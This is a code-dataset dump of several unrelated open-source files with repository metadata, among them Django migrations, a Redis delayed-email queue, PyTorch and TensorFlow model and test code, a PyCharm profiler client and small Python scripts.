'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'blog.comment': {
'Meta': {'unique_together': "(('post', 'number'),)", 'object_name': 'Comment'},
'body': ('django.db.models.fields.TextField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'number': ('django.db.models.fields.IntegerField', [], {}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['blog.Post']"}),
'reply_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Comment']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'blog.post': {
'Meta': {'unique_together': "(('id', 'user'),)", 'object_name': 'Post'},
'body': ('django.db.models.fields.TextField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['blog.Tag']", 'symmetrical': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'blog.recommend': {
'Meta': {'unique_together': "(('post', 'user'),)", 'object_name': 'Recommend'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Post']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recommends_user'", 'to': "orm['auth.User']"})
},
'blog.subscribed': {
'Meta': {'unique_together': "(('user', 'subscribe_user'),)", 'object_name': 'Subscribed'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subscribe_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subscribed'", 'to': "orm['auth.User']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'me_subscribe'", 'to': "orm['auth.User']"})
},
'blog.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '42'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['blog']
|
[
"apkawa@gmail.com"
] |
apkawa@gmail.com
|
85dcc5969e56bb08a2daeb27e23d432d34c58286
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02718/s147463629.py
|
e093f018cdb275a578db1fcc576e49cebc099eb6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
# 161 B
N,M = list(map(int, input().split()))
A = list(map(int, input().split()))
list.sort(A, reverse=True)
print('Yes') if A[M-1] >= (sum(A)/(4*M)) else print('No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
1ebc38c9e5488846563e087b28f5172fb47bfd2c
|
fce15571b2b65769758d4885deb4365153672a47
|
/task_queue/redis_impl.py
|
280a7be2d96fe3b835fdcdecc0303fe4016e773c
|
[
"MIT"
] |
permissive
|
xlui/eFuture
|
239f66c698390af9d4c5b82b32eed81e36c177e8
|
9bb9e8faca561ca5ccfb16de5401b6acd2ec692d
|
refs/heads/py
| 2021-06-02T23:52:08.224564
| 2019-08-24T04:57:24
| 2019-08-24T04:57:24
| 149,577,756
| 0
| 0
|
MIT
| 2021-03-20T00:10:07
| 2018-09-20T08:35:32
|
Python
|
UTF-8
|
Python
| false
| false
| 1,624
|
py
|
import datetime
import uuid
from log import logger
from task_queue import connection, QUEUE_KEY
def push(message: str, date: datetime.datetime):
"""Push a message into redis zset
:param message: message content
:param date: the date this message to be consumed
:return: None
"""
msg_id = str(uuid.uuid4())
pipeline = connection.pipeline()
pipeline.set(msg_id, message)
pipeline.zadd(QUEUE_KEY, {
msg_id: date.timestamp()
})
pipeline.execute()
logger.info(f'Save a new future email: [message: {message}, date: {date}]')
def pop():
"""Check the first task in redis(which is the task with the smallest score)
if the score(timestamp) is smaller or equal to current timestamp, the task
should be take out and done.
:return: True if task is take out, and False if it is not the time.
"""
task = connection.zrange(QUEUE_KEY, 0, 0)
if not task:
return False, 'No emails now!'
msg_id = task[0]
timestamp = connection.zscore(QUEUE_KEY, msg_id)
now = datetime.datetime.now().timestamp()
if timestamp < now or abs(timestamp - now) <= 1e-6:
message = connection.get(msg_id)
pipeline = connection.pipeline()
pipeline.zrem(QUEUE_KEY, msg_id)
pipeline.delete(msg_id)
pipeline.execute()
return True, message
return False, "It's too early now!"
if __name__ == '__main__':
now = datetime.datetime.now()
logger.debug('push hello')
push('hello', now + datetime.timedelta(seconds=10))
while True:
b, m = pop()
if b:
logger.debug(m)
|
[
"liuqi0315@gmail.com"
] |
liuqi0315@gmail.com
|
cbbfba9bdb63e74a1c7c05035f325aa7f0d7af7e
|
c49e35bc834c259cc0d7ab2165dbd48e12f6d1b6
|
/model/word_attn_classifier.py
|
c5ac2ca9a9d5b3b24f2e003883f3afb2027270a6
|
[
"MIT"
] |
permissive
|
kenchan0226/dual_view_review_sum
|
f18997bce101ee3ac70d96813d75c6cb29ac921c
|
2ff1c7323b98f0a8ca1dfb0341806e05b87faf52
|
refs/heads/master
| 2023-03-02T10:00:26.315254
| 2021-02-03T02:13:27
| 2021-02-03T02:13:27
| 266,673,121
| 19
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,184
|
py
|
import torch
import torch.nn as nn
from torch.nn import init
from model.attention import Attention
class WordAttnClassifier(nn.Module):
def __init__(self, query_hidden_size, memory_bank_size, num_classes, attn_mode, dropout=0.0, ordinal=False, hr_enc=False):
super(WordAttnClassifier, self).__init__()
self.memory_bank_size = memory_bank_size
self.query_hidden_size = query_hidden_size
self.num_classes = num_classes
self.hr_enc = hr_enc
# for word level memory bank
self._query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
init.uniform_(self._query_vector, -0.1, 0.1)
self.attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
# for sent level memory bank
if self.hr_enc:
self._sent_query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
init.uniform_(self._sent_query_vector, -0.1, 0.1)
self.sent_attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
self.ordinal = ordinal
self.expanded_memory_size = memory_bank_size if not hr_enc else 2 * memory_bank_size
if ordinal:
self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
nn.Dropout(p=dropout),
nn.ReLU(),
nn.Linear(self.expanded_memory_size, num_classes),
nn.Sigmoid())
else:
self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
nn.Dropout(p=dropout),
nn.ReLU(),
nn.Linear(self.expanded_memory_size, num_classes),
nn.LogSoftmax(dim=1))
def forward(self, encoder_memory_bank, src_mask, sent_memory_bank=None, sent_mask=None):
"""
:param encoder_hidden_states: [batch, src_len, memory_bank_size]
:param sent_memory_bank: [batch, sent_num, memory_bank_size]
:return:
"""
batch_size = encoder_memory_bank.size(0)
query_vector_expanded = self._query_vector.expand(batch_size, self.query_hidden_size) # [batch, query_hidden_size]
context, attn_dist, _ = self.attention_layer(query_vector_expanded, encoder_memory_bank, src_mask)
attn_dist_tuple = (attn_dist, None)
if self.hr_enc:
sent_query_vector_expanded = self._sent_query_vector.expand(batch_size, self.query_hidden_size) # [batch, query_hidden_size]
sent_context, sent_attn_dist, _ = self.sent_attention_layer(sent_query_vector_expanded, sent_memory_bank, sent_mask)
# [batch, 2 * memory_bank_size]
context = torch.cat([context, sent_context], dim=1)
attn_dist_tuple = (attn_dist, sent_attn_dist)
logit = self.classifier(context)
return logit, attn_dist_tuple
|
[
"kenchanhp@gmail.com"
] |
kenchanhp@gmail.com
|
257d9c5993e931be92ff8bd92ceacd54ed6c9727
|
3869cbd5ee40e2bab5ca08b80b48115a7b4c1d5a
|
/Python-3/basic_examples/strings/string_expandtabs.py
|
c31cbcf03990c262555129f083b6bf6e26bbd25b
|
[
"MIT"
] |
permissive
|
Tecmax/journaldev
|
0774c441078816f22edfd68286621493dd271803
|
322caa8e88d98cfe7c71393bcd2a67cf77368884
|
refs/heads/master
| 2020-07-08T04:05:03.028015
| 2019-08-12T09:17:48
| 2019-08-12T09:17:48
| 203,559,030
| 0
| 1
|
MIT
| 2019-08-21T10:13:47
| 2019-08-21T10:13:47
| null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
s = 'A\tB\tC\tD'
print(s)
print(s.expandtabs())
s = 'ABCD\tE\tF'
print(s)
print(s.expandtabs())
s = 'ABCDEFGHIJK\tG'
print(s.expandtabs())
s = 'ABCDEFGHIJK\t\tG'
print(s.expandtabs())
s = 'ABC\tD'
print(s)
print(s.expandtabs())
print(s.expandtabs(tabsize=0))
print(s.expandtabs(tabsize=1))
print(s.expandtabs(tabsize=2))
print(s.expandtabs(tabsize=3))
print(s.expandtabs(tabsize=4))
print(s.expandtabs(tabsize=5))
print(s.expandtabs(tabsize=6))
print(s.expandtabs(tabsize=7))
s = 'ABC\tD'
print(s.expandtabs(tabsize=-1))
print(s.expandtabs(tabsize=-3))
|
[
"pankaj.0323@gmail.com"
] |
pankaj.0323@gmail.com
|
63f26a8db8b11444b2c37dda05f8b04c536308c0
|
5fe709d0643394168dd919bbc721adabebe60a97
|
/profiler/translation/seq2seq/models/gnmt.py
|
b3bc9147c44775f20a46b6cbce1d24d4ee9b4917
|
[
"MIT"
] |
permissive
|
vibhatha/pipedream
|
8232b67366a0dd84e41fd496c9b2e8b86dbfdd89
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
refs/heads/master
| 2020-12-20T18:21:35.337352
| 2020-07-06T04:54:23
| 2020-07-06T04:54:23
| 236,167,878
| 0
| 0
|
MIT
| 2020-01-25T12:34:04
| 2020-01-25T12:34:03
| null |
UTF-8
|
Python
| false
| false
| 2,830
|
py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch.nn as nn
from mlperf_compliance import mlperf_log
from seq2seq.utils import gnmt_print
import seq2seq.data.config as config
from seq2seq.models.seq2seq_base import Seq2Seq
from seq2seq.models.encoder import ResidualRecurrentEncoder
from seq2seq.models.decoder import ResidualRecurrentDecoder
import torchmodules.torchgraph as torchgraph
class GNMT(Seq2Seq):
"""
GNMT v2 model
"""
def __init__(self, vocab_size, hidden_size=512, num_layers=8, bias=True,
dropout=0.2, batch_first=False, math='fp32',
share_embedding=False):
"""
Constructor for the GNMT v2 model.
:param vocab_size: size of vocabulary (number of tokens)
:param hidden_size: internal hidden size of the model
:param num_layers: number of layers, applies to both encoder and
decoder
:param bias: globally enables or disables bias in encoder and decoder
:param dropout: probability of dropout (in encoder and decoder)
:param batch_first: if True the model uses (batch,seq,feature) tensors,
if false the model uses (seq, batch, feature)
:param math: arithmetic type, 'fp32' or 'fp16'
:param share_embedding: if True embeddings are shared between encoder
and decoder
"""
super(GNMT, self).__init__(batch_first=batch_first)
gnmt_print(key=mlperf_log.MODEL_HP_NUM_LAYERS,
value=num_layers)
gnmt_print(key=mlperf_log.MODEL_HP_HIDDEN_SIZE,
value=hidden_size)
gnmt_print(key=mlperf_log.MODEL_HP_DROPOUT,
value=dropout)
if share_embedding:
embedder = nn.Embedding(vocab_size, hidden_size, padding_idx=config.PAD)
else:
embedder = None
self.encoder = ResidualRecurrentEncoder(vocab_size, hidden_size,
num_layers, bias, dropout,
batch_first, embedder)
self.decoder = ResidualRecurrentDecoder(vocab_size, hidden_size,
num_layers, bias, dropout,
batch_first, math, embedder)
def forward(self, input_encoder, input_enc_len, input_decoder):
context = self.encode(input_encoder, input_enc_len)
hidden = None
if isinstance(context, torchgraph.TensorWrapper):
hidden = torchgraph.TensorWrapper(hidden, "hidden", context.graph_creator)
context = (context, input_enc_len, hidden)
output, _, _ = self.decode(input_decoder, context)
return output
|
[
"vibhatha@gmail.com"
] |
vibhatha@gmail.com
|
b221ad4641f6d3b0f304e77820b72eeb21327c1a
|
f4bf81d4e80468331a09401dbaeef12465aca853
|
/lib/python/helpers/profiler/run_profiler.py
|
d1054a5f28c84804105642bc0bdc2a81ea369adb
|
[] |
no_license
|
nottyo/intellibot
|
45c41d673608a0a1291c6387f9d33ef449f18837
|
0547d987deaad90260abe33db5284eae9704eb9b
|
refs/heads/master
| 2020-12-30T23:59:29.795725
| 2017-04-10T07:53:59
| 2017-04-10T07:53:59
| 86,574,980
| 1
| 0
| null | 2017-03-29T11:37:54
| 2017-03-29T11:37:53
| null |
UTF-8
|
Python
| false
| false
| 5,121
|
py
|
import os
import sys
import time
import traceback
from socket import AF_INET
from socket import SOCK_STREAM
from socket import socket
from _prof_imports import ProfilerResponse
from prof_io import ProfWriter, ProfReader
from prof_util import generate_snapshot_filepath, stats_to_response, get_snapshot_basepath, save_main_module, execfile
base_snapshot_path = os.getenv('PYCHARM_SNAPSHOT_PATH')
remote_run = bool(os.getenv('PYCHARM_REMOTE_RUN', ''))
def StartClient(host, port):
""" connects to a host/port """
s = socket(AF_INET, SOCK_STREAM)
MAX_TRIES = 100
i = 0
while i < MAX_TRIES:
try:
s.connect((host, port))
except:
i += 1
time.sleep(0.2)
continue
return s
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) # TODO: is it safe?
class Profiler(object):
def __init__(self):
try:
import vmprof_profiler
self.profiling_backend = vmprof_profiler.VmProfProfile()
self.profiling_backend.basepath = get_snapshot_basepath(base_snapshot_path, remote_run)
print('Starting vmprof profiler\n')
except ImportError:
try:
import yappi_profiler
self.profiling_backend = yappi_profiler.YappiProfile()
print('Starting yappi profiler\n')
except ImportError:
import cProfile
self.profiling_backend = cProfile.Profile()
print('Starting cProfile profiler\n')
def connect(self, host, port):
s = StartClient(host, port)
self.initializeNetwork(s)
def initializeNetwork(self, sock):
try:
sock.settimeout(None) # infinite, no timeouts from now on - jython does not have it
except:
pass
self.writer = ProfWriter(sock)
self.reader = ProfReader(sock, self)
self.reader.start()
time.sleep(0.1) # give threads time to start
def process(self, message):
if hasattr(message, 'save_snapshot'):
self.save_snapshot(message.id, generate_snapshot_filepath(message.save_snapshot.filepath, remote_run, self.snapshot_extension()), remote_run)
else:
raise AssertionError("Unknown request %s" % dir(message))
def run(self, file):
m = save_main_module(file, 'run_profiler')
globals = m.__dict__
try:
globals['__builtins__'] = __builtins__
except NameError:
pass # Not there on Jython...
self.start_profiling()
try:
execfile(file, globals, globals) # execute the script
finally:
self.stop_profiling()
self.save_snapshot(0, generate_snapshot_filepath(base_snapshot_path, remote_run, self.snapshot_extension()), remote_run)
def start_profiling(self):
self.profiling_backend.enable()
def stop_profiling(self):
self.profiling_backend.disable()
def get_stats(self):
self.profiling_backend.create_stats()
return self.profiling_backend.stats
def has_tree_stats(self):
return hasattr(self.profiling_backend, 'tree_stats_to_response')
def tree_stats_to_response(self, filename, response):
return self.profiling_backend.tree_stats_to_response(filename, response)
def snapshot_extension(self):
if hasattr(self.profiling_backend, 'snapshot_extension'):
return self.profiling_backend.snapshot_extension()
return '.pstat'
def dump_snapshot(self, filename):
dir = os.path.dirname(filename)
if not os.path.exists(dir):
os.makedirs(dir)
self.profiling_backend.dump_stats(filename)
return filename
def save_snapshot(self, id, filename, send_stat=False):
self.stop_profiling()
if filename is not None:
filename = self.dump_snapshot(filename)
print('Snapshot saved to %s' % filename)
if not send_stat:
response = ProfilerResponse(id=id, snapshot_filepath=filename)
else:
response = ProfilerResponse(id=id)
stats_to_response(self.get_stats(), response)
if self.has_tree_stats():
self.tree_stats_to_response(filename, response)
self.writer.addCommand(response)
self.start_profiling()
if __name__ == '__main__':
host = sys.argv[1]
port = int(sys.argv[2])
file = sys.argv[3]
del sys.argv[0]
del sys.argv[0]
del sys.argv[0]
profiler = Profiler()
try:
profiler.connect(host, port)
except:
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
traceback.print_exc()
sys.exit(1)
# add file path to sys.path
sys.path.insert(0, os.path.split(file)[0])
profiler.run(file)
|
[
"traitanit.hua@ascendcorp.com"
] |
traitanit.hua@ascendcorp.com
|
e54de02e976647aa74f068b06084f0e6aa09524f
|
0e60ed9251cd6e2ccc9645c45783a53fdabc22aa
|
/backend/home/migrations/0003_auto_20200613_0652.py
|
3f900f39b9ebe293952dd7350fd52cfd4ad1297b
|
[] |
no_license
|
crowdbotics-apps/mobile-13-dev-5964
|
7b522691afd94b4e7662ba5244abb1a8ab6768a3
|
dee9594b7a96748c4c729d77145a01c592339e01
|
refs/heads/master
| 2022-10-22T08:47:30.634185
| 2020-06-13T07:29:34
| 2020-06-13T07:29:34
| 271,942,482
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 972
|
py
|
# Generated by Django 2.2.13 on 2020-06-13 06:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("home", "0002_load_initial_data"),
]
operations = [
migrations.AddField(
model_name="customtext",
name="caasdc",
field=models.ManyToManyField(
blank=True, related_name="customtext_caasdc", to="home.HomePage"
),
),
migrations.AddField(
model_name="customtext",
name="sacscs",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="customtext_sacscs",
to=settings.AUTH_USER_MODEL,
),
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
a72bf1e2b39f2476cd8b658a62118d236cf164a7
|
4f026ddcf8f058d884f15259f0e42c2178eb2157
|
/roomlistwatcher/common/messaging/filters.py
|
787b395ad5017aa059aacbf980e915a82a2ffff0
|
[
"MIT"
] |
permissive
|
dnguyen0304/roomlistwatcher
|
afd95e5f601f77fc8d7c4cd4307e60f36b53162c
|
7ac4d5172de22dd8906662da521995c8e06c2617
|
refs/heads/master
| 2021-01-20T22:55:04.289589
| 2017-11-16T04:09:49
| 2017-11-16T04:09:49
| 101,829,306
| 0
| 0
| null | 2017-11-16T04:09:49
| 2017-08-30T02:38:56
|
Python
|
UTF-8
|
Python
| false
| false
| 382
|
py
|
# -*- coding: utf-8 -*-
import abc
class StringFilter(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def filter(self, string):
"""
Parameters
----------
string : str
Returns
-------
str
If the data should not be filtered. Otherwise None.
"""
raise NotImplementedError
|
[
"dnguyen0304@gmail.com"
] |
dnguyen0304@gmail.com
|
76950567499f25a761480d17cfaa528a71dd1eda
|
522f4b1b18416443062ec53157340fb2d6f43b1b
|
/ch4/automate_possible_keys.py
|
028d5a70faf14dc5253f9c385bc41c6c444e2c5d
|
[] |
no_license
|
thewchan/impractical_python
|
fd3f3d82c6f45d1fd0dea55611bc8d5369c8982c
|
9963df374b7de5b3eb1faa58e45de7857c3fc792
|
refs/heads/master
| 2021-05-22T00:41:05.491349
| 2020-04-04T02:18:16
| 2020-04-04T02:18:16
| 252,884,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
"""
Pseudo-code
ask for length of key
initiate possible integers
get sum of positive integers
get negative integers
merge into 1 string
get permutation
loop through permutation and sum up abs values
eliminate those with sum not equal to sum of positive integers
print out list of tuples
"""
from itertools import permutations
while True:
key_len = input("Enter length of key: ")
try:
key_len = int(key_len)
except ValueError:
print("Please enter a number.")
continue
break
positive_integers = list(range(key_len + 1))
positive_integers.pop(0)
print(
"Possible key values (not including direction): ",
*positive_integers,
)
negative_integers = [-1 * x for x in positive_integers]
all_integers = positive_integers + negative_integers
raw_perms = list(permutations(all_integers, key_len))
filtered_perms = []
for perm in raw_perms:
abs_perm = [abs(x) for x in perm]
set_perm = set(abs_perm)
if len(set_perm) == len(perm):
filtered_perms.append(perm)
print("Valid key combinations:\n", *filtered_perms, sep='\n')
print(f"Number of valid key combinations: {len(filtered_perms)}")
|
[
"thewchan@gmail.com"
] |
thewchan@gmail.com
|
a5846c31c6b2366554d3e964fe1fab8ed55f1bb7
|
f228b0cbe141d23ad918f9fe7a40674ca8d7c963
|
/First_project.py
|
c59b3f5d3eea312d6cae46c1d93c796c070a73e0
|
[] |
no_license
|
Vazimax/My_first_project
|
a990996e753a979f8bc0393ce97837be55e84418
|
36b8c61a9e05ed9b35b5364521f79c906036415d
|
refs/heads/main
| 2023-01-23T06:04:43.082815
| 2020-11-24T18:47:02
| 2020-11-24T18:47:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
def odd_even_project() :
number = input("Enter a number :")
while number != "x":
try:
number = int(number)
if number%2 == 0 :
print("It's an even number =)")
else :
print("It's an odd number :)")
except ValueError:
print("Please Enter a valid number")
number = input("Enter a number again , and if you wanna exit press 'x' :")
|
[
"aboubakr.elhabti@gmail.com"
] |
aboubakr.elhabti@gmail.com
|
416028c8780dd01160c0b6dd3d29eb7302eda7ca
|
3b5ee9aa584bfca56dabc19d75717f6104c0dc95
|
/gaia/compute_synthetic_decam_fluxes.py
|
c4888f1d885e08e3fbaada340ff8434fa33f40ce
|
[] |
no_license
|
rongpu/desi-misc
|
95690ca99962940fd4a793d523edf4d2ce68b4c3
|
c700344ebf8f74391fcce69a47e4ca57fc4b34f8
|
refs/heads/master
| 2023-09-01T00:49:07.399914
| 2023-08-11T17:10:40
| 2023-08-11T17:10:40
| 173,173,912
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,939
|
py
|
# Convert the files from .csv.gz to .fits
from __future__ import division, print_function
import sys, os, glob, time, warnings, gc
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table, vstack, hstack, join
import fitsio
from multiprocessing import Pool
from gaiaxpy import generate, PhotometricSystem
output_dir = '/global/cfs/cdirs/desi/users/rongpu/data/gaia_dr3/xp_synthetic_decam_photometry'
fns = sorted(glob.glob('/pscratch/sd/r/rongpu/gaia_dr3/xp_continuous_mean_spectrum/XpContinuousMeanSpectrum_*.fits'))
print(len(fns))
def do_something(fn):
output_fn = os.path.join(output_dir, os.path.basename(fn).replace('XpContinuousMeanSpectrum_', 'XpSyntheticDECam_'))
if os.path.isfile(output_fn):
print(output_fn, 'already exists!')
return None
cat = Table(fitsio.read(fn))
# Workaround to make the multidimensional arrays pandas-compatible
cat = vstack([cat, cat[:1].copy()])
for col in ['bp_coefficients', 'bp_coefficient_errors', 'bp_coefficient_correlations', 'rp_coefficients', 'rp_coefficient_errors', 'rp_coefficient_correlations']:
tmp = list(np.array(cat[col]))
tmp.pop()
tmp += [np.array([0])]
cat[col] = tmp
cat = cat[:-1]
print(len(cat))
cat = cat.to_pandas()
phot_system = PhotometricSystem.DECam
photom = generate(cat, photometric_system=phot_system, save_file=False)
photom = Table.from_pandas(photom)
print(np.allclose(photom['Decam_mag_g'], (-2.5*np.log10(photom['Decam_flux_g']))-56.1),
np.allclose(photom['Decam_mag_r'], (-2.5*np.log10(photom['Decam_flux_r']))-56.1),
np.allclose(photom['Decam_mag_i'], (-2.5*np.log10(photom['Decam_flux_i']))-56.1),
np.allclose(photom['Decam_mag_z'], (-2.5*np.log10(photom['Decam_flux_z']))-56.1),
np.allclose(photom['Decam_mag_Y'], (-2.5*np.log10(photom['Decam_flux_Y']))-56.1))
for col in ['Decam_flux_g', 'Decam_flux_r', 'Decam_flux_i', 'Decam_flux_z', 'Decam_flux_Y', 'Decam_flux_error_g', 'Decam_flux_error_r', 'Decam_flux_error_i', 'Decam_flux_error_z', 'Decam_flux_error_Y']:
photom[col.replace('Decam_', '')] = photom[col] * 10**31.44
print(np.allclose(photom['Decam_mag_g'], (22.5-2.5*np.log10(photom['flux_g']))),
np.allclose(photom['Decam_mag_r'], (22.5-2.5*np.log10(photom['flux_r']))),
np.allclose(photom['Decam_mag_i'], (22.5-2.5*np.log10(photom['flux_i']))),
np.allclose(photom['Decam_mag_z'], (22.5-2.5*np.log10(photom['flux_z']))),
np.allclose(photom['Decam_mag_Y'], (22.5-2.5*np.log10(photom['flux_Y']))))
photom = photom[['source_id', 'flux_g', 'flux_r', 'flux_i', 'flux_z', 'flux_Y', 'flux_error_g', 'flux_error_r', 'flux_error_i', 'flux_error_z', 'flux_error_Y']]
photom.write(output_fn)
return None
n_process = 16
with Pool(processes=n_process) as pool:
res = pool.map(do_something, fns, chunksize=1)
|
[
"rongpu.zhou@gmail.com"
] |
rongpu.zhou@gmail.com
|
bffd8f4a50731672574fa8ad2fd5d12b21e6b2ef
|
35f9def6e6d327d3a4a4f2959024eab96f199f09
|
/developer/lab/tools/NVIDIA/FasterTransformer/sample/tensorflow/unit_test/squad_unit_test.py
|
a938652cd196387dd17c4e11a6540fd972e6272f
|
[
"Apache-2.0",
"CAL-1.0-Combined-Work-Exception",
"CAL-1.0",
"MIT",
"CC-BY-SA-4.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
arXiv-research/DevLab-III-1
|
ec10aef27e1ca75f206fea11014da8784752e454
|
c50cd2b9154c83c3db5e4a11b9e8874f7fb8afa2
|
refs/heads/main
| 2023-04-16T19:24:58.758519
| 2021-04-28T20:21:23
| 2021-04-28T20:21:23
| 362,599,929
| 2
| 0
|
MIT
| 2021-04-28T20:36:11
| 2021-04-28T20:36:11
| null |
UTF-8
|
Python
| false
| false
| 6,779
|
py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import argparse
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import os.path
import json
import copy
import sys
sys.path.append("./tensorflow/tensorflow_bert")
import tensorflow as tf
from squad_evaluate_v1_1 import evaluate
# from ckpt_type_convert import checkpoint_dtype_cast
class TestDecoding(unittest.TestCase):
is_init = False
@classmethod
def setUpClass(cls):
super(TestDecoding, cls).setUpClass()
if cls.is_init == False:
cls.expected_version = '1.1'
cls.truth_dataset = "squad_data/dev-v1.1.json"
cls.fp32_model_path = "squad_model/model.ckpt"
cls.fp16_model_path = "squad_fp16_model/model.ckpt"
assert(os.path.isfile(cls.truth_dataset))
assert(os.path.isfile(cls.fp32_model_path + ".index"))
if(not os.path.isfile(cls.fp16_model_path + ".index")):
os.system("python tensorflow/tensorflow_bert/ckpt_type_convert.py --init_checkpoint={} --fp16_checkpoint={}".format(cls.fp32_model_path, cls.fp16_model_path))
cls.tf_fp32_output_path = "squad_tf_output/fp32/"
cls.ft_fp32_output_path = "squad_ft_output/fp32/"
cls.ft_fp16_output_path = "squad_ft_output/fp16/"
cls.predict_filename = "predictions.json"
os.system("python tensorflow/tensorflow_bert/bert/run_squad.py \
--predict_batch_size=8 \
--vocab_file=squad_model/vocab.txt \
--bert_config_file=squad_model/bert_config.json \
--init_checkpoint={} \
--train_file=squad_data/train-v1.1.json \
--do_predict=True \
--predict_file=squad_data/dev-v1.1.json \
--max_seq_length=384 \
--output_dir={}".format(cls.fp32_model_path, cls.tf_fp32_output_path))
cls.tf_fp32_score = cls.run_evaluate(cls, cls.tf_fp32_output_path + cls.predict_filename)
print("[INFO] tensorflow results: {}".format(cls.tf_fp32_score))
cls.is_init = True
def run_evaluate(self, file_path):
with open(file_path) as f, open(self.truth_dataset) as b:
f_json = json.load(f)
b_json = json.load(b)
if (b_json['version'] != self.expected_version):
print('Evaluation expects v-' + self.expected_version +
', but got dataset with v-' + b_json['version'],
file=sys.stderr)
dataset = b_json['data']
score = evaluate(dataset, f_json)
return score
def test_squad_fp32(self):
print("{INFO] test_squad_fp32")
os.system("./bin/encoder_gemm 8 384 12 64 0 0")
os.system("python tensorflow/tensorflow_bert/run_squad_wrap.py \
--floatx=float32 \
--predict_batch_size=8 \
--vocab_file=squad_model/vocab.txt \
--bert_config_file=squad_model/bert_config.json \
--init_checkpoint={} \
--train_file=squad_data/train-v1.1.json \
--do_predict=True \
--predict_file=squad_data/dev-v1.1.json \
--max_seq_length=384 \
--output_dir={}".format(self.fp32_model_path, self.ft_fp32_output_path))
os.system("rm gemm_config.in")
self.ft_fp32_score = self.run_evaluate(self.ft_fp32_output_path + self.predict_filename)
